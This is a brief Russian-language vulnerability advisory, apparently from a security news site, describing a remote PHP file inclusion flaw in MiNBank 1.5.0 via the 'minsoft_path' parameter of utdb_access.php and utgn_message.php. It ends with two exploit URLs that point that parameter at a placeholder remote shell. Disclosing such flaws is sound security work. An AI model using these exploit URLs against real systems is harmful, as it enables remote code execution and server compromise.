Программа: MiNBank 1.5.0

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP
сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки
входных данных в параметре «minsoft_path» сценариями utdb_access.php и
utgn_message.php. Удаленный пользователь может выполнить произвольный PHP
сценарий на целевой системе с привилегиями Web сервера.

Эксплоит:

http://site.com/minba/utility/utdb_access.php?minsoft_path=Shellz?

http://site.com/minba/utility/utgn_message.php?minsoft_path=Shellz?



Оставить мнение